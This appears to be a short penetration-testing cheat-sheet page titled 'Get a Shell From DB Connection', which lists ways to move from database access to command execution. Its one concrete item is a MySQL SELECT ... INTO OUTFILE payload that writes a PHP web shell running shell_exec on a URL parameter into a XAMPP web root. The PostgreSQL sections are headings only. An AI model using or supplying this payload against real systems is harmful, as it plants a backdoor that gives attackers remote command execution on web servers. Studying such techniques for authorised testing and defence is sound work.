Get a Shell From DB Connection
You have a connection to a database. How can you get a shell from that?
Write a Web Shell
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'Databases Support Command Execution
PostgreSQL Intended Command Execution
PostgreSQL Command Execution Using Extensions
Last updated